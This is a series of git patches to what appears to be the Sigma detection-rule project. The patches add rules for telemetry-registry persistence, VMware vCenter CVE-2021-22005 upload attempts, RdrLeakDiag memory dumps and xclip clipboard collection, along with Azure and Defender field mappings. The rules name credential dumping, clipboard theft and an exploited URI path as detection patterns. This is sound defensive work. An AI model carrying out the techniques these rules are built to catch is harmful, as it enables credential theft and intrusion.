auditd.data.audit_backlog_wait_time + audit_enabled: auditd.data.audit_enabled + audit_failure: auditd.data.audit_failure + auid: user.auid + banners: auditd.data.banners + bool: auditd.data.bool + bus: auditd.data.bus + capability: auditd.data.capability + cap_fe: auditd.data.cap_fe + cap_fi: auditd.data.cap_fi + cap_fp: auditd.data.cap_fp + cap_fver: auditd.data.cap_fver + cap_pa: auditd.data.cap_pa + cap_pe: auditd.data.cap_pe + cap_pi: auditd.data.cap_pi + cap_pp: auditd.data.cap_pp + category: user.selinux.category + cgroup: auditd.data.cgroup + changed: auditd.data.changed + cipher: auditd.data.cipher + class: auditd.data.class + cmd: auditd.data.cmd + code: auditd.data.code + comm: auditd.data.comm + compat: auditd.data.compat + cwd: process.cwd + daddr: auditd.data.daddr + data: auditd.data.data + default-context: auditd.data.default-context + dev: auditd.paths.dev + device: auditd.data.device + dir: auditd.data.dir + direction: auditd.data.direction + dmac: auditd.data.dmac + dport: auditd.data.dport + enforcing: auditd.data.enforcing + entries: auditd.data.entries + exe: process.executable + exit: auditd.data.exit + fam: auditd.data.fam + family: auditd.data.family + fd: auditd.data.fd + file: auditd.data.file + flags: auditd.data.flags + fe: auditd.data.fe + feature: auditd.data.feature + fi: auditd.data.fi + fp: auditd.data.fp + format: auditd.data.format + fsgid: user.fsgid + fsuid: user.fsuid + fver: auditd.data.fver + gid: user.gid + grantors: auditd.data.grantors + grp: auditd.data.grp + hook: auditd.data.hook + hostname: auditd.data.hostname + icmp_type: auditd.data.icmp_type + id: auditd.data.id + igid: auditd.data.igid + img-ctx: auditd.data.img-ctx + inif: auditd.data.inif + ip: auditd.data.ip + ipid: auditd.data.ipid + ino: auditd.data.ino + inode: auditd.paths.inode + inode_gid: auditd.data.inode_gid + inode_uid: auditd.data.inode_uid + invalid_context: auditd.data.invalid_context + ioctlcmd: auditd.data.ioctlcmd + ipx-net: auditd.data.ipx-net + item: auditd.paths.item + items: auditd.data.items + iuid: auditd.data.iuid + kernel: auditd.data.kernel + kind: auditd.data.kind + ksize: auditd.data.ksize + laddr: auditd.data.laddr + len: auditd.data.len + lport: auditd.data.lport + list: auditd.data.list + mac: auditd.data.mac + macproto: auditd.data.macproto + maj: auditd.data.maj + major: auditd.data.major + minor: auditd.data.minor + mode: auditd.paths.mode + model: auditd.data.model + msg: auditd.data.msg + nargs: auditd.data.nargs + name: auditd.paths.name + nametype: auditd.paths.nametype + net: auditd.data.net + new: auditd.data.new + new-chardev: auditd.data.new-chardev + new-disk: auditd.data.new-disk + new-enabled: auditd.data.new-enabled + new-fs: auditd.data.new-fs + new_gid: auditd.data.new_gid + new-level: auditd.data.new-level + new_lock: auditd.data.new_lock + new-log_passwd: auditd.data.new-log_passwd + new-mem: auditd.data.new-mem + new-net: auditd.data.new-net + new_pe: auditd.data.new_pe + new_pi: auditd.data.new_pi + new_pp: auditd.data.new_pp + new-range: auditd.data.new-range + new-rng: auditd.data.new-rng + new-role: auditd.data.new-role + new-seuser: auditd.data.new-seuser + new-vcpu: auditd.data.new-vcpu + nlnk-fam: auditd.data.nlnk-fam + nlnk-grp: auditd.data.nlnk-grp + nlnk-pid: auditd.data.nlnk-pid + oauid: auditd.data.oauid + obj: auditd.data.obj + obj_gid: auditd.data.obj_gid + obj_uid: auditd.data.obj_uid + oflag: auditd.data.oflag + ogid: auditd.paths.ogid + ocomm: auditd.data.ocomm + old: auditd.data.old + old-auid: auditd.data.old-auid + old-chardev: auditd.data.old-chardev + old-disk: auditd.data.old-disk + old-enabled: auditd.data.old-enabled + old_enforcing: auditd.data.old_enforcing + old-fs: auditd.data.old-fs + old-level: auditd.data.old-level + old_lock: auditd.data.old_lock + old-log_passwd: auditd.data.old-log_passwd + old-mem: auditd.data.old-mem + old-net: auditd.data.old-net + old_pa: auditd.data.old_pa + old_pe: auditd.data.old_pe + old_pi: auditd.data.old_pi + old_pp: auditd.data.old_pp + old_prom: auditd.data.old_prom + old-range: auditd.data.old-range + old-rng: auditd.data.old-rng + old-role: auditd.data.old-role + old-ses: auditd.data.old-ses + old-seuser: auditd.data.old-seuser + old_val: auditd.data.old_val + old-vcpu: auditd.data.old-vcpu + op: auditd.data.op + opid: auditd.data.opid + oses: auditd.data.oses + ouid: auditd.paths.ouid + outif: auditd.data.outif + parent: auditd.data.parent + path: source.path + per: auditd.data.per + perm: auditd.data.perm + perm_mask: auditd.data.perm_mask + permissive: auditd.data.permissive + pfs: auditd.data.pfs + printer: auditd.data.printer + prom: auditd.data.prom + proctitle: proctitle + proto: auditd.data.proto + qbytes: auditd.data.qbytes + range: auditd.data.range + rdev: auditd.paths.rdev + reason: auditd.data.reason + removed: auditd.data.removed + res: auditd.data.res + resrc: auditd.data.resrc + result: auditd.result + role: user.selinux.role + rport: auditd.data.rport + saddr: auditd.data.socket.saddr + sauid: auditd.data.sauid + scontext: auditd.data.scontext + selected-context: auditd.data.selected-context + seperm: auditd.data.seperm + seqno: auditd.data.seqno + seperms: auditd.data.seperms + seresult: auditd.data.seresult + ses: auditd.data.ses + seuser: auditd.data.seuser + sgid: user.sgid + sig: auditd.data.sig + sigev_signo: auditd.data.sigev_signo + smac: auditd.data.smac + spid: auditd.data.spid + sport: auditd.data.sport + state: auditd.data.state + subj: auditd.data.subj + success: auditd.data.success + suid: user.suid + syscall: auditd.data.syscall + table: auditd.data.table + TargetFileName: auditd.data.file + tclass: auditd.data.tclass + tcontext: auditd.data.tcontext + terminal: auditd.data.terminal + tty: auditd.data.tty + type: user.selinux.domain + uid: user.uid + unit: auditd.data.unit + uri: auditd.data.uri + user: user.selinux.user + uuid: auditd.data.uuid + val: auditd.data.val + ver: auditd.data.ver + ssvirt: auditd.data.virt + vm: auditd.data.vm + vm-ctx: auditd.data.vm-ctx + vm-pid: auditd.data.vm-pid + watch: auditd.data.watch From 9cb826b0d158c7647b0a27a4edcced844b28b3be Mon Sep 17 00:00:00 2001 From: Steven Date: Fri, 24 Sep 2021 09:00:26 +0200 Subject: [PATCH 1094/1367] Rename auditbeat.yml to ecs-auditbeat-modules-enabled.yml --- tools/config/{auditbeat.yml => ecs-auditbeat-modules-enabled.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tools/config/{auditbeat.yml => ecs-auditbeat-modules-enabled.yml} (100%) diff --git a/tools/config/auditbeat.yml b/tools/config/ecs-auditbeat-modules-enabled.yml similarity index 100% rename from tools/config/auditbeat.yml rename to tools/config/ecs-auditbeat-modules-enabled.yml From ef756956477ce591d3b136358e69fd5618266a39 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:39:56 +0200 Subject: [PATCH 1095/1367] convert re to endswith --- ...busing_windows_telemetry_for_persistence.yml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml index 459fc153..ecf8aba9 100644 --- a/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml @@ -11,7 +11,7 @@ tags: - attack.t1053 author: Sreeman date: 2020/09/29 -modified: 2021/09/09 +modified: 2021/09/24 fields: - EventID - CommandLine @@ -23,7 +23,20 @@ logsource: detection: selection: TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\' - Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' + Details|endswith: + - .sh + - .exe + - .dll + - .bin + - .bat + - .cmd + - .js + - .ps + - .vb + - .jar + - .hta + - .msi + - .vbs condition: selection falsepositives: - none From 16452ca80ee078b7ca25aba17e7b7229159b62a2 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 24 Sep 2021 21:21:09 +0700 Subject: [PATCH 1096/1367] Create web_cve_2021_22005_vmware_file_upload --- .../web/web_cve_2021_22005_vmware_file_upload | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/web/web_cve_2021_22005_vmware_file_upload diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload b/rules/web/web_cve_2021_22005_vmware_file_upload new file mode 100644 index 00000000..b09ba195 --- /dev/null +++ b/rules/web/web_cve_2021_22005_vmware_file_upload @@ -0,0 +1,23 @@ +title: VMware vCenter Server File Upload CVE-2021-22005 +id: b014ea07-8ea0-4859-b517-50a4e5b7ecec +status: experimental +description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server. +author: Sittikorn S +date: 2021/09/24 +references: + - https://kb.vmware.com/s/article/85717 + - https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri|contains: + - '/analytics/telemetry/ph/api/hyper/send?' + condition: selection +falsepositives: +- Vulnerability Scanning/Pentesting +level: high From f903640b73b51beae006958e05690dbf51056f85 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 24 Sep 2021 21:29:43 +0700 Subject: [PATCH 1097/1367] Update web_cve_2021_22005_vmware_file_upload --- rules/web/web_cve_2021_22005_vmware_file_upload | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload b/rules/web/web_cve_2021_22005_vmware_file_upload index b09ba195..c788d1da 100644 --- a/rules/web/web_cve_2021_22005_vmware_file_upload +++ b/rules/web/web_cve_2021_22005_vmware_file_upload @@ -11,13 +11,13 @@ tags: - attack.initial_access - attack.t1190 logsource: - category: webserver + category: webserver detection: selection: cs-method: 'POST' c-uri|contains: - '/analytics/telemetry/ph/api/hyper/send?' - condition: selection + condition: selection falsepositives: -- Vulnerability Scanning/Pentesting + - Vulnerability Scanning/Pentesting level: high From dea89ad324816ac4fd033353a1dd77ad669594a3 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 24 Sep 2021 21:35:04 +0700 Subject: [PATCH 1098/1367] Update and rename web_cve_2021_22005_vmware_file_upload to web_cve_2021_22005_vmware_file_upload.yml --- ...ware_file_upload => web_cve_2021_22005_vmware_file_upload.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve_2021_22005_vmware_file_upload => web_cve_2021_22005_vmware_file_upload.yml} (100%) diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload b/rules/web/web_cve_2021_22005_vmware_file_upload.yml similarity index 100% rename from rules/web/web_cve_2021_22005_vmware_file_upload rename to rules/web/web_cve_2021_22005_vmware_file_upload.yml From ecd4719a200dd52b091570046fc9ee343bc3a414 Mon Sep 17 00:00:00 2001 From: kidrek Date: Fri, 24 Sep 2021 18:22:06 +0200 Subject: [PATCH 1099/1367] add new rule win_process_dump_rdrleakdiag --- .../win_process_dump_rdrleakdiag.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/win_process_dump_rdrleakdiag.yml diff --git a/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml new file mode 100644 index 00000000..22f2284c --- /dev/null +++ b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml @@ -0,0 +1,22 @@ +title: Process Dump via RdrLeakDiag.exe +id: EDADB1E5-5919-4E4C-8462-A9E643B02C4B +description: Detects a process memory dump performed by RdrLeakDiag.exe +status: experimental +level: high +references: + - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ +author: Cedric MAURUGEON +date: 2021/09/24 +tags: + - attack.credential_access + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: RdrLeakDiag.exe + CommandLine|contains: + - 'fullmemdmp' + condition: selection +falsepositives: Unknown From 4bbe4962b01b5b2bffd02edf3659cd670dc9ddef Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Fri, 24 Sep 2021 18:40:10 +0200 Subject: [PATCH 1100/1367] New Rule - Linux - Auditd - Clipboard Collection --- .../lnx_auditd_clipboard_collection.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_clipboard_collection.yml diff --git a/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml new file mode 100644 index 00000000..4f5f3a00 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml @@ -0,0 +1,27 @@ +title: Clipboard Collection with Xclip Tool +id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf +description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/24 +references: + - https://attack.mitre.org/techniques/T1115/ + - https://linux.die.net/man/1/xclip + - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ +logsource: + product: linux + service: auditd +detection: + xclip: + type: EXECVE + a0: xclip + a1: '-selection' + a2: clipboard + a3: '-o' + condition: xclip +tags: + - attack.collection + - attack.t1115 +falsepositives: + - Legitimate usage of xclip tools +level: low \ No newline at end of file From 267da517453656a2fa701a48fa2830c3c947836b Mon Sep 17 00:00:00 2001 From: kidrek Date: Fri, 24 Sep 2021 22:18:00 +0200 Subject: [PATCH 1101/1367] The issues have been fixed --- .../process_creation/win_process_dump_rdrleakdiag.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml index 22f2284c..96687d49 100644 --- a/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml +++ b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml @@ -1,5 +1,5 @@ title: Process Dump via RdrLeakDiag.exe -id: EDADB1E5-5919-4E4C-8462-A9E643B02C4B +id: edadb1e5-5919-4e4c-8462-a9e643b02c4b description: Detects a process memory dump performed by RdrLeakDiag.exe status: experimental level: high @@ -16,7 +16,7 @@ logsource: detection: selection: OriginalFileName: RdrLeakDiag.exe - CommandLine|contains: - - 'fullmemdmp' + CommandLine|contains: fullmemdmp condition: selection -falsepositives: Unknown +falsepositives: + - Unknown From 9ca1ea993d846a0d297edb89de0cf58b0f216b49 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 19:29:40 -0500 Subject: [PATCH 1102/1367] Create ecs-azure-ad_signinlogs.yml --- tools/config/ecs-azure-ad_signinlogs.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 tools/config/ecs-azure-ad_signinlogs.yml diff --git a/tools/config/ecs-azure-ad_signinlogs.yml b/tools/config/ecs-azure-ad_signinlogs.yml new file mode 100644 index 00000000..d4728c6b --- /dev/null +++ b/tools/config/ecs-azure-ad_signinlogs.yml @@ -0,0 +1,20 @@ +title: Azure AD Signin Audit Logs Elasticsearch ecs mapping +order: 20 +backends: + - es-qs + - es-rule +fieldmappings: + category: azure.signinlogs.category + identity: azure.signinlogs.identity + riskDetail: azure.signinlogs.properties.risk_detail + riskLevelAggregated: azure.signinlogs.properties.risk_level_aggregated + riskLevelDuringSignIn: azure.signinlogs.properties.risk_level_during_signin + riskstate: azure.signinlogs.properties.risk_state + conditionalAccessStatus: azure.signinlogs.properties.conditional_access_status + resultType: azure.signinlogs.properties.status.error_code + ipAddress: azure.signinlogs.properties.ip_address + callerIpAddress: azure.signinlogs.properties.ip_address + properties.deviceDetail.deviceId: azure.signinlogs.properties.device_detail.device_id + properties.deviceDetail.operatingSystem: azure.signinlogs.properties.device_detail.operating_system + properties.deviceDetail.browser: azure.signinlogs.properties.device_detail.browser + properties.clientAppUsed: azure.signinlogs.properties.client_app_used From 527975c02f02d8da0febb913b1e106370ed834d8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 19:33:01 -0500 Subject: [PATCH 1103/1367] Update ecs-azure-ad_signinlogs.yml --- tools/config/ecs-azure-ad_signinlogs.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/config/ecs-azure-ad_signinlogs.yml b/tools/config/ecs-azure-ad_signinlogs.yml index d4728c6b..1fccca06 100644 --- a/tools/config/ecs-azure-ad_signinlogs.yml +++ b/tools/config/ecs-azure-ad_signinlogs.yml @@ -6,6 +6,7 @@ backends: fieldmappings: category: azure.signinlogs.category identity: azure.signinlogs.identity + resultSignature: azure.signinlogs.result_signature riskDetail: azure.signinlogs.properties.risk_detail riskLevelAggregated: azure.signinlogs.properties.risk_level_aggregated riskLevelDuringSignIn: azure.signinlogs.properties.risk_level_during_signin From dd2f3e50db5d9887887ceb0ebfdf635d06704b35 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 19:53:21 -0500 Subject: [PATCH 1104/1367] Create ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 tools/config/ecs-ms365_defender.yml diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml new file mode 100644 index 00000000..c9447407 --- /dev/null +++ b/tools/config/ecs-ms365_defender.yml @@ -0,0 +1,16 @@ +title: Microsoft 365 Defender Logs Elasticsearch ecs mapping +order: 20 +backends: + - es-qs + - es-rule +fieldmappings: + classification: microsoft.m365_defender.alerts.classification + determination: microsoft.m365_defender.alerts.determination + severity: microsoft.m365_defender.alerts.severity + status: microsoft.m365_defender.alerts.status + detectionSource: microsoft.m365_defender.alerts.detectionSource + threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName + registryHive: microsoft.m365_defender.alerts.entities.registryHive + registryKey: microsoft.m365_defender.alerts.entities.registryKey + registryValueType: microsoft.m365_defender.alerts.entities.registryValueType + ipAddress: microsoft.m365_defender.alerts.entities.ipAddress From 176b9662fca9f73773e3f9cf57068ee2b2632415 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 20:01:00 -0500 Subject: [PATCH 1105/1367] Update ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml index c9447407..2e6fee3a 100644 --- a/tools/config/ecs-ms365_defender.yml +++ b/tools/config/ecs-ms365_defender.yml @@ -10,6 +10,7 @@ fieldmappings: status: microsoft.m365_defender.alerts.status detectionSource: microsoft.m365_defender.alerts.detectionSource threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName + entityType: microsoft.m365_defender.alerts.entities.entityType registryHive: microsoft.m365_defender.alerts.entities.registryHive registryKey: microsoft.m365_defender.alerts.entities.registryKey registryValueType: microsoft.m365_defender.alerts.entities.registryValueType From 696f343ac3d3a93e64a9643d56d502de97ce6a83 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 20:02:04 -0500 Subject: [PATCH 1106/1367] Delete ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 tools/config/ecs-ms365_defender.yml diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml deleted file mode 100644 index 2e6fee3a..00000000 --- a/tools/config/ecs-ms365_defender.yml +++ /dev/null @@ -1,17 +0,0 @@ -title: Microsoft 365 Defender Logs Elasticsearch ecs mapping -order: 20 -backends: - - es-qs - - es-rule -fieldmappings: - classification: microsoft.m365_defender.alerts.classification - determination: microsoft.m365_defender.alerts.determination - severity: microsoft.m365_defender.alerts.severity - status: microsoft.m365_defender.alerts.status - detectionSource: microsoft.m365_defender.alerts.detectionSource - threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName - entityType: microsoft.m365_defender.alerts.entities.entityType - registryHive: microsoft.m365_defender.alerts.entities.registryHive - registryKey: microsoft.m365_defender.alerts.entities.registryKey - registryValueType: microsoft.m365_defender.alerts.entities.registryValueType - ipAddress: microsoft.m365_defender.alerts.entities.ipAddress From 00f4773eeb79d1fc9611e0f6256263da4507f904 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 20:02:39 -0500 Subject: [PATCH 1107/1367] Create ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 tools/config/ecs-ms365_defender.yml diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml new file mode 100644 index 00000000..9bf97867 --- /dev/null +++ b/tools/config/ecs-ms365_defender.yml @@ -0,0 +1,18 @@ +title: Microsoft 365 Defender Elasticsearch ecs mapping +order: 20 +backends: + - es-qs + - es-rule +fieldmappings: + classification: microsoft.m365_defender.alerts.classification + determination: microsoft.m365_defender.alerts.determination + severity: microsoft.m365_defender.alerts.severity + status: microsoft.m365_defender.alerts.status + detectionSource: microsoft.m365_defender.alerts.detectionSource + threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName + entityType: microsoft.m365_defender.alerts.entities.entityType + registryHive: microsoft.m365_defender.alerts.entities.registryHive + registryKey: microsoft.m365_defender.alerts.entities.registryKey + registryValueType: microsoft.m365_defender.alerts.entities.registryValueType + ipAddress: microsoft.m365_defender.alerts.entities.ipAddress + From 7c8df0eb5551d77ee9db6e8be621c9a2d42007a4 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Sat, 25 Sep 2021 08:05:00 +0700 Subject: [PATCH 1108/1367] Update web_cve_2021_22005_vmware_file_upload.yml --- rules/web/web_cve_2021_22005_vmware_file_upload.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload.yml b/rules/web/web_cve_2021_22005_vmware_file_upload.yml index c788d1da..c57ca266 100644 --- a/rules/web/web_cve_2021_22005_vmware_file_upload.yml +++ b/rules/web/web_cve_2021_22005_vmware_file_upload.yml @@ -15,8 +15,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: - - '/analytics/telemetry/ph/api/hyper/send?' + c-uri|contains: '/analytics/telemetry/ph/api/hyper/send?' condition: selection falsepositives: - Vulnerability Scanning/Pentesting From 31ef53738d833035d53f5a330222199640748280 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 25 Sep 2021 11:37:02 +0200 Subject: [PATCH 1109/1367] refactor: removed old Joomla rules, made generic path traversal --- ...web_cve_2010_0943_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_0944_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_0985_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1219_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1304_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1305_exploitation_attempt.yml | 27 ------------------- ...web_cve_2010_1306_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1307_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1308_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1312_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1313_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1314_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1345_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1353_exploitation_attempt.yml | 25 ----------------- ...web_cve_2010_1354_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1470_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1471_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1472_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1473_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1474_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1475_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1476_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1494_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1495_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1532_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1533_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1534_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1535_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1601_exploitation_attempt.yml | 25 ----------------- ...web_cve_2010_1602_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1607_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1657_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1659_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1714_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1717_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1718_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1719_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1722_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1875_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1953_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1954_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1955_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1956_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1979_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1980_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1981_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1983_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2033_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2034_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2035_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2036_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2122_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2259_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2307_exploitation_attempt.yml | 27 ------------------- ...web_cve_2010_2682_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2861_exploitation_attempt.yml | 27 ------------------- ...web_cve_2010_2920_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_3426_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_4231_exploitation_attempt.yml | 25 ----------------- ...web_cve_2010_4617_exploitation_attempt.yml | 26 ------------------ ...eb_path_traversal_exploitation_attempt.yml | 26 ++++++++++++++++++ 61 files changed, 26 insertions(+), 1560 deletions(-) delete mode 100644 rules/web/web_cve_2010_0943_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_0944_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_0985_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1219_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1304_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1305_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1306_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1307_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1308_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1312_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1313_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1314_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1345_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1353_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1354_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1470_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1471_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1472_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1473_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1474_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1475_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1476_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1494_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1495_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1532_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1533_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1534_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1535_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1601_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1602_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1607_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1657_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1659_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1714_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1717_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1718_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1719_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1722_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1875_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1953_exploitation_attempt.yml delete mode 100644 